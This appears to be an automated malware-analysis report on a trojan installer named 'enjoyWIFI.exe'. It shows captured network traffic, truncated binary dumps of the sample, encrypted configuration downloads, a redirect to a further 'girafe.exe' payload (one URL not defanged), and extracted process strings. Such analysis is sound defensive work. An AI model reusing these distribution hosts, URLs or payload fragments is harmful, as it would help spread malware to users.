Date: Mon, 09 Oct 2017 10:13:38 GMT
Content-Length: 1881569
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........F....................@..........................@............
.......@..............................P........,......................
......................................................................
..............CODE....8........................... ..`DATA....L.......
....................@...BSS.....P................................idata
..P...........................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc....,.......,..................@..P.............@..
....................@..P..............................................
......................................................................
..............................................string................&l
t;.@.....m.@..........)@..(@..(@..(@......(@..Free...)@..InitInstance.
. )@..CleanupInstance..<(@..ClassType..@(@..ClassName..T(@..ClassNa
meIs..|(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..Inheri
tsFrom...)@..Dispatch...)@..MethodAddress...*@..MethodName..L*@..Field
Address...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObj
ect.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.
@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>

GET /enjoyWiFi/enjoyWIFI.exe HTTP/1.1


Host: yeawindows.com


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 09 Oct 2017 04:38:57 GMT
Accept-Ranges: bytes
ETag: "4dca5e85b840d31:0"
Server: Microsoft-IIS/7.5
Date: Mon, 09 Oct 2017 10:14:05 GMT
Content-Length: 1881569
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........F....................@..........................@............
.......@..............................P........,......................
......................................................................
..............CODE....8........................... ..`DATA....L.......
....................@...BSS.....P................................idata
..P...........................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc....,.......,..................@..P.............@..
....................@..P..............................................
......................................................................
..............................................string................&l
t;.@.....m.@..........)@..(@..(@..(@......(@..Free...)@..InitInstance.
. )@..CleanupInstance..<(@..ClassType..@(@..ClassName..T(@..ClassNa
meIs..|(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..Inheri
tsFrom...)@..Dispatch...)@..MethodAddress...*@..MethodName..L*@..Field
Address...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObj
ect.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.
@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>


GET /download/APSnapdoAMRev HTTP/1.1
Host: install.rgbcjfir.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: hXXp://cdn.piytrwd.com/apdata/installers/auto/exe/girafe.exe
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:32 GMT
Content-Length: 177
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://cdn.p
iytrwd.com/apdata/installers/auto/exe/girafe.exe">here</a>.&l
t;/h2>..</body></html>..HTTP/1.1 302 Found..Cache-Contr
ol: private..Content-Type: text/html; charset=utf-8..Location: hXXp://
cdn.piytrwd.com/apdata/installers/auto/exe/girafe.exe..Server: Microso
ft-IIS/8.5..X-AspNetMvc-Version: 5.0..X-AspNet-Version: 4.0.30319..X-P
owered-By: ASP.NET..Date: Mon, 09 Oct 2017 10:13:32 GMT..Content-Lengt
h: 177..<html><head><title>Object moved</title>
;</head><body>..<h2>Object moved to <a href="http
://cdn.piytrwd.com/apdata/installers/auto/exe/girafe.exe">here</
a>.</h2>..</body></html>....



GET /black/mirenda/3/default/UA.xml HTTP/1.1
Host: room1.360dev.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 09 Oct 2017 10:13:32 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 181848
Last-Modified: Mon, 09 Oct 2017 10:00:03 GMT
Connection: keep-alive
ETag: "59db48a3-2c658"
Accept-Ranges: bytes
7k92I2inPflHCBVZUy1dDfuK93Od3aZZ5u05dtKJqxVMLJ5unF436kvxCho6i6BmrLO5g9
UBYDIko4F2swzSRYsSL6QIKntvduhHbI30 kwvh8M0f3XLlvFV/lryeWX2zihnedKEe6SX
ALdPifc559aF1fA5n2j/kaLkAoqw9LDCx1Bb8ZIRPwC4/LB396IjgjLSd7iXRr30NK2ekD
de/4lmwtALQumjkkO1AvAy/xuppZj6wcFIHfzYiQK7nd9y8YfbYO1MmCcWTts77Yfag/JQ
  vPMY6seytsMOYbk/4gkW5AWq9AJpwh5yT0ZMg1fCMBb5yXNJkEyWQd3mRl3WK2M1yR6m
MFciUxeqdLKIfMqjxCX9nPusCmkEqAICoAdNM8sAjIq 8p6fJn1WsUaWlKqvJHAsWqwwHw
BkplXeClTmmNzX5jY1m6ds4M5GBIJjEp8prv9UpExkZlZN/puGJDnIbGnURgmNRE9pjhkV
4TrhteKoRhRAzCqIztVHbiJ7MaBf OmIuCXZPea6CgU7Wl6hS9Jvw0uktRU2O w3ze3pJW
qelxvesFW4hK4ESj6KHaZ0FgLjn9KuDHjpNKw91mBFkIaiH ChcrkhOAhT0GA7/4iSpLKD
RMILn4IJCPzLaKK2Wk1O6o7hvNIaEfexsy5HKXLtz ozD1BrTi8LXz/NOmWc8MSf4rKthn
A VTEJxmvovcdgStVsPNOne8dA6FodZlymwdIpjwYgLjeRVxHSO6vP/APfaHtKMdzrCahb
y3HzE/GCB7EB2vAkDVb9MovNdPFuZ6Ilv6Ut7JysyFR4Oq87hlbII5ZNbbw5vWzgeKU9f3
W4IaEWdBrtHmPy7zdgabhwgD/hUFzFSV3Ntg8GmdK14kSXIbdgUktDNSZdY0WU1lTp9dPw
tw883HfFvHK7q2dOc0nl3oa/uwdIiyhxHZ2kqLfEHDqrmGh5Ja14Tz/h06e879D6cRMHfh
FLoHpKrVN1Huz6OioBtTq0XHZWkxumW9AucA7YmX5PnPBM0Xq9jxZoA6Ejq/iJIepsl1si
Bdp2S BvTr7uGYDMIl7ALMF9V/krD95jCmaHwDP2J9QLni5lLnbCWs3L0J95/M/Tz99IB6
m0R0mOv/sOIr7N pNRImcbVulM2m0mh/oWJVoAV5CC7FrQcsLhh6ZUSIBP1R4edcD/o7W7
hjqk5YYDJagsGEDu7 hqWKuqJU4B7 uAWz26f6KHqKEwpn5L344kDIBIhCqnqKGydlTh/g
5vvOvOtQ14ZrLp6PGnCfKLFW9VwHgeb5 fX9ZZlUD hbso17wAc5WxsiQ/O21ZQV3mK5gt
8WW523TKt724oPxpAsgvR6PDO4lV7eqRwfq7Sjcqm515bRYZSZMMEyVXsBJ46Uf3pz985N
NewkI7CUigVJ nNtX85BYP4zb0rz9MPvt2XydnDHccplKkvJMjTXya9b2ECA RxjUfzyhh
eVVrgJoH6tlBAXMoUSkKkaysyRtVKvoX9VzDr9Z3c09AOPvp3kC8XZbu64SP1bJglN
<<< skipped >>>

GET /black/prisonbreak/3/default.xml HTTP/1.1


Host: room1.360dev.info


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 09 Oct 2017 10:13:33 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 300
Last-Modified: Mon, 09 Oct 2017 10:00:01 GMT
Connection: keep-alive
ETag: "59db48a1-12c"
Accept-Ranges: bytes
7k92I2inPflHCBVZUy1dDfuK93Od3aZZ5u05dtKJqxXHjeGWnXg1XhM3eFHz gT8HGVWL1
a3l275CE67m1uTJmHIplji9T3rv2WwyJAaWjxPYUo8U5x/jL/IJ66wkybBNb2pNbOSRdH2
gHg0bo86voenozycTO6p7Q0uBySq5l8LrKL6GyeWDJBuA5t8E97eoRTlOhOzmGRi7Eh3SD
WtR4vRLCTeEibL0bU XHCb3qlEI U/N4bV5An7hNubcTijV29Ac75T44WWDwf5xzCF2ix2
YLDC81UfrmYMxys6r o=HTTP/1.1 200 OK..Server: nginx/1.10.3 (Ubuntu)..Da
te: Mon, 09 Oct 2017 10:13:33 GMT..Content-Type: text/xml; charset=utf
-8..Content-Length: 300..Last-Modified: Mon, 09 Oct 2017 10:00:01 GMT.
.Connection: keep-alive..ETag: "59db48a1-12c"..Accept-Ranges: bytes..7
k92I2inPflHCBVZUy1dDfuK93Od3aZZ5u05dtKJqxXHjeGWnXg1XhM3eFHz gT8HGVWL1a
3l275CE67m1uTJmHIplji9T3rv2WwyJAaWjxPYUo8U5x/jL/IJ66wkybBNb2pNbOSRdH2g
Hg0bo86voenozycTO6p7Q0uBySq5l8LrKL6GyeWDJBuA5t8E97eoRTlOhOzmGRi7Eh3SDW
tR4vRLCTeEibL0bU XHCb3qlEI U/N4bV5An7hNubcTijV29Ac75T44WWDwf5xzCF2ix2Y
LDC81UfrmYMxys6r o=..



GET /xml/ HTTP/1.1
Host: freegeoip.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 09 Oct 2017 10:13:29 GMT
Content-Type: application/xml
Content-Length: 363
Connection: keep-alive
Set-Cookie: __cfduid=d8ffb4ad10c7c47feab97df521061de6f1507544009; expires=Tue, 09-Oct-18 10:13:29 GMT; path=/; domain=.freegeoip.net; HttpOnly
Vary: Origin
X-Database-Date: Thu, 05 Oct 2017 04:08:57 GMT
X-Ratelimit-Limit: 15000
X-Ratelimit-Remaining: 14998
X-Ratelimit-Reset: 2443
Server: cloudflare-nginx
CF-RAY: 3ab09149659e8430-KBP
<Response>..<IP>194.242.96.218</IP>..<CountryCode
>UA</CountryCode>..<CountryName>Ukraine</CountryName
>..<RegionCode>63</RegionCode>..<RegionName>Khark
ivs'ka Oblast'</RegionName>..<City>Kharkiv</Cit
y>..<ZipCode></ZipCode>..<TimeZone>Europe/Kiev<
;/TimeZone>..<Latitude>49.9808</Latitude>..<Longitud
e>36.2527</Longitude>..<MetroCode>0</MetroCode>.&
lt;/Response>.HTTP/1.1 200 OK..Date: Mon, 09 Oct 2017 10:13:29 GMT.
.Content-Type: application/xml..Content-Length: 363..Connection: keep-
alive..Set-Cookie: __cfduid=d8ffb4ad10c7c47feab97df521061de6f150754400
9; expires=Tue, 09-Oct-18 10:13:29 GMT; path=/; domain=.freegeoip.net;
 HttpOnly..Vary: Origin..X-Database-Date: Thu, 05 Oct 2017 04:08:57 GM
T..X-Ratelimit-Limit: 15000..X-Ratelimit-Remaining: 14998..X-Ratelimit
-Reset: 2443..Server: cloudflare-nginx..CF-RAY: 3ab09149659e8430-KBP..
<Response>..<IP>194.242.96.218</IP>..<CountryCode
>UA</CountryCode>..<CountryName>Ukraine</CountryName
>..<RegionCode>63</RegionCode>..<RegionName>Khark
ivs'ka Oblast'</RegionName>..<City>Kharkiv</Cit
y>..<ZipCode></ZipCode>..<TimeZone>Europe/Kiev<
;/TimeZone>..<Latitude>49.9808</Latitude>..<Longitud
e>36.2527</Longitude>..<MetroCode>0</MetroCode>.&
lt;/Response>...
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







conhost.exe_3120:




.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

SearchProtocolHost.exe_3552:




.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

%original file name%.exe_644_rwx_005D0000_00010000:




%UUUU

SearchFilterHost.exe_1952:




.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

enjoyWIFI.exe_4004:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.4.2)
Inno Setup Messages (5.1.11)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
1.0.0.1
1.0.0.1

enjoyWIFI.tmp_2584:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
%s_%d
windows
PasswordChar
OnKeyDown,
OnKeyPress
OnKeyUpD
ssHorizontal
OnKeyUp
OnKeyUp\nA
uxtheme.dll
comctl32.dll
RegDeleteKeyExA
advapi32.dll
.DEFAULT\Control Panel\International
user32.dll
shlwapi.dll
TPSExec
TPSRuntimeClassImporter
TPSExportedVar
Cannot Import
Interface not supported
Uh.RC
TPSCustomDebugExec
TPSDebugExec
Monochrome
SHORTCUTTOKEY
ArrowKeys
THKInvalidKey
THKInvalidKeys
TCustomHotKey
THotKey
HotKey
InvalidKeys<
vsReport
OnKeyUp4
Control '%s' has no parent window
Parent given is not a parent of '%s'
msctls_hotkey32
OnKeyDown
InvalidKeys
oleacc.dll
Uh.UE
RICHED20.DLL
RICHED32.DLL
TPasswordEdit
TPasswordEditP
PasswordEdit*
Password
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
shell32.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
t.Htb
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
MsgWaitForMultipleObjects
regsvr32.exe"
Spawning _RegDLL.tmp
_isetup\_RegDLL.tmp
_RegDLL.tmp %u %u
REGDLL failed with exit code 0x%x
REGDLL mutex wait failed (%d, %d)
REGDLL returned unknown result code %d
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
SetNamedPipeHandleState
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
ExtractRecData: Unicode data unsupported by this build
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
1.2.1
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.4.2.ee2 (a)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
IMsg
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Uh.NG
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
GetPassword
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFileEx: The file "%s" was not found
ExtractTemporaryFileToStream: The file "%s" was not found
ExtractTemporaryFileSize: The file "%s" was not found
ExtractTemporaryFileToBuffer: The file "%s" was not found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
FormKeyDown
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s
PasswordCheckHash
Expression error '%s'
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
srcexe
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_RegDLL.tmp
REGDLL_EXE
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
%d.%d
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
CheckPassword
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.4.2.ee2 (a)
Original Setup EXE:
Windows NT
Windows
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.4.2 (a)
Portions Copyright (C) 2000-2011 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Email:86186588@qq.com
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
Need to restart Windows? %s
Will not restart Windows automatically.
System\CurrentControlSet\Control\Windows
PasswordPage
PasswordLabel8
PasswordEdit<
PasswordEditLabel@
Could not find page with ID %d
PrepareToInstall failed: %s
/:*?"<>|
\/:*?"<>|
TOutputMsgWizardPage
TOutputMsgWizardPagel
TOutputMsgMemoWizardPage
